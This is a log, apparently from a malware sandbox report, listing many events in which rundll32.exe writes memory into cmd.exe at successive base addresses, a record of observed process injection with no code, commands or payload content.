Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2A78
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2A7E
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2ACF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2AF2
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2AF8
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2B62
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2B68
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2BAC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2BC0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2BCE
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2BF3
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2BF9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2C3B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2C65
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2C6B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2CAF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2CD2
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2CD8
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2D41
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2D47
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2D8B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2DAE
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2DB4
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2DF5
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2E20
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2E26
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2E6A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2E8D
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2E93
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2EFD
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2F03
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2F47
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2F6A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2F70
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2FB4
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2FD5
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2FDB
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3044
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D304A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3098
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D30AC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D30B3
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D30B8
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D30C3
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D30CC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D30E7
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D30ED
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3131
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3154
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D315A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D319C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D31B7
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D31BD
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3201
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3224
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D322A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D326C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3287
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D328D
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D32E4
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D32EA
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D332C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3347
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D334D
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3399
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D339F
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D33F0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D33F4
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D33F8
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D33FC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3400
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3404
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3408
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D340C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3410
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D34A7
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D34AD
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3501
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D356A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D35D2
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D35E6
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3607
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3613
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3630
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D36A9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D36FD
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3704
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3715
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3723
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D372A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D37F9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3856
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D38EA
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D394A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D39D6
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A13
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A1A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A40
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A46
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A52
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A77
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A8D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A97
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3AB9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3ACD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3AD8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3B07
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3B10
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3B3A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3B74
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3C1F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3C5A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3D6C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3DAE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3DB8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3E9C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3F9F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3FAE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4077
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D407D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4168
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D418E
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D419A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D41B6
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4260
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D42C8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D42F8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4300
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D432B
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4333
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4369
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D43AB
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D43E1
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D43FA
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4400
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D443A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D45E0
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4637
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D481B
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D48C5
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D48CC
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D48F7
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4A6A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4B21
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4B28
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4B5A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4B8B
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4D46
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4D90
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4DCF
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4DDC
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4DE3
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4DFB
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4E6D
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4EB9
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4EC6
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4ECD
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4EE4
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4F31
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4F49
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4F7E
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D4F90
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D508A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5099
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D50A0
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5135
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D517A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5197
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D51E3
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D51EE
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5266
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D529B
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D52AE
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D52EA
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D52F5
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D532A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D53E7
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5580
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5587
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D55EE
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D55F5
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5616
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D561D
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5678
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D567F
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D56E3
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D56F8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5747
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5759
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D57FD
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5818
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D58D7
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D58DE
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D58F9
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5905
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5913
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5969
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5981
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D598C
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5993
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D59B3
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5A22
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5A6A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5B33
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5BD2
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5BEB
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5BF2
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5C0B
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5C40
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5C71
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5C78
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5E3F
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5FA2
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5FA9
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5FC9
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D5FD0
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6137
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6194
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D61A1
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6200
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6207
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6225
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D622C
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6267
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D62E3
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6358
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D635F
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D63DD
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D63E4
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D640A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6411
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D644A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D64FD
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D65A1
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D65A8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D66B8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D66BF
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D66DA
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D66E7
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D66EE
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D66FD
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6724
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6798
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D67A6
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D67C8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D67D7
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D67FA
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6940
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D694D
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6954
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D696B
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D69A8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6A5D
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6A64
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6B68
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6B6F
